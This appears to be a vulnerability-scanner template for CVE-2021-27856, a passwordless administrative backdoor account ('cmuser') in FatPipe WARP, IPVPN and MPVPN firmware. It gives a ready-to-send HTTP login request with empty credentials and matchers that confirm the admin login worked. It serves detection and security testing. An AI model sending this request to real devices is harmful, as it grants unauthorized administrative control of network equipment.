FatPipe WARP, IPVPN, and MPVPN software prior to versions 10.1.2r60p91 and 10.2.2r42 contain an account named "cmuser" with administrative privileges and no password, letting attackers gain unauthorized admin access, exploit requires no authentication.
PoC代码[已公开]
id: CVE-2021-27856
info:
name: FatPipe WARP/IPVPN/MPVPN - Backdoor Account
author: gy741
severity: critical
description: |
FatPipe WARP, IPVPN, and MPVPN software prior to versions 10.1.2r60p91 and 10.2.2r42 contain an account named "cmuser" with administrative privileges and no password, letting attackers gain unauthorized admin access, exploit requires no authentication.
reference:
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php
- https://www.fatpipeinc.com/support/advisories.php
- https://www.fatpipeinc.com/support/cve-list.php
- https://www.zeroscience.mk/codes/fatpipe_backdoor.txt
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-27856
cwe-id: NVD-CWE-Other
epss-score: 0.60793
epss-percentile: 0.98205
cpe: cpe:2.3:o:fatpipeinc:warp_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: fatpipeinc
product: warp_firmware
tags: cve,cve2021,fatpipe,default-login,backdoor,auth-bypass,vkev,vuln
http:
- raw:
- |
POST /fpui/loginServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
loginParams=%7B%22username%22%3A%22cmuser%22%2C%22password%22%3A%22%22%2C%22authType%22%3A0%7D
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/json"
part: header
- type: word
words:
- '"loginRes":"success"'
- '"activeUserName":"cmuser"'
condition: and
# digest: 4a0a00473045022017f3705ef32adbd67b7ab6747446f80d108b409122070e0e76dd9a910bd3a36b022100ab836bff77323e466928428a7162b947251de83360d4e8baf8805c881f8b9e23:922c64590222798bb761d5b6d8e72950